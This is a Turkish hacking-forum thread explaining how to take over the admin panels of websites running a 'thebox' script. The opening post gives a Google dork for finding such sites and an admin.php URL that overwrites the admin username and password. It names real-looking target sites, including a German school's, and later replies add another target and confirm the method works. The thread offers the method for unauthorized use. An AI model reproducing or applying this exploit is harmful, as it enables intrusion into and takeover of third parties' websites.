Admin Paneline Sızma
-
SEVGILI ARKADAŞLARIM BU DOKUMANI YAYINLARKEN LUTFEN SIZDEN TEK BIR RICA ISTIYORUM HACKLENMIŞ SITELERI ASLA VE ASLA HACKLEMEYIN SIZDEN RICAM...
BU UYARI SOYLEDIKTEN SONRA GELELIM SADETE İLK ONCE GOOGLE BIZIM EN BUYUK HACKER KARDESIMIZ BUNA NE YAZSAAK BIZE MUTLAKA SOYLIYECEKTIR ;)
İLK ONCE BIRAZDAN VERECEĞİM CUMLEYI GOOGLE ABIMIZDEN ARATIN.
KELIMEMIZ: inurl:thebox/thebox.php BUNU TARATIN TARATTIKTAN SONRA SİTEYI AÇIN AÇTIK MI AÇTIĞIMIZDA BIZIM KARŞIMIZA ŞU ŞEKIL BIR YAZI ÇIKAR http://www.martin-buber-oberschule.de/thebox/thebox.php burdakı thebox.php silin yerine su kelımeyı yapıştırın /admin.php?act=write&username=CLK-J35&password=111&aduser=CLK-J35&adpass=111 YAPIŞTIRIN sonra sizi gırışe yonlendırecektır
USER:CLK-J35
PASWORD:111
BUNLARI GIRDIKTEN SONRA ADMIN PANELI ELINIZDE SAYGILARIMI ILETIYORUM
BU DOKUMAN BEN YAZDIM AMA İÇİNDEKİ BİLGİLERİ KENDİME DERLEDİM
BİLGİLER ALINTIDIR....
-
SEVGILI ARKADAŞLAR GOOGLEYE BAKARSINIZ DA EĞER SITE AÇILIYORSA BUNU DENEYIN AÇILMIYORSA HATA VERIYORSDA DENEMEYIN ÇUNKU HACKLENMŞTIR. AMA GOOGLEDE ÇOOK AZ SAYIDA KALDI AKLINIZI KULLANIN BAŞKA ARAMA MOTORLARINDANDA ARATIN NEOLUR NEOLMAZ DEĞİL Mİ?;)
=) HA UNUTMADAN TEKRAR DIYORUM HACKLENEN SITELERI HACKLEMEYIN...
-
Arkadaşlar kımse denemedımı bu yolu deneyen yokmu aranızda....
-
evet denedım calısıyor pekı bız bununla neler yapabılecegızkı pek ıngılızcem yok o yuzden kusura bakma tam olarak anlayamadım actıgım boxtan yardımcı olursan sevınırım
-
bu şekıl bır şey çıkar karşına herşey tabloda yazıyoo..
bu arada bu resım alıntıdır kendı şahsım yapmamışımdır...
-
kardes bunun kullanıcı adını ve sifresini degiştirmişler
-
mabel bunu yazdı:
kardes bunun kullanıcı adını ve sifresini degiştirmişler
/admin.php?act=write&username=CLK-J35&password=111&aduser=CLK-J35&adpass=111 bunu yapıştırdıktan sonra hep aynı şifre olur :D -
http://acipayam.net/thebox/thebox.php kardeş ben bi tane buldum ama şifre yanlış diyo yada ben yanlış yapıyorum bakın isterseniz bi :)
-
ben denedim ama hiç bi şekilde kabul etmiyo
-
ben yaptım arkadaşlar oluyor cillop gibi fakat index atılan sitelere mi yapıyorum bilemem ama sonunda çaktım olayı yapmıyormuşummm.... saygılar...
-
hoca yontem süper :) cok saolun elinize saglik calisio walla :)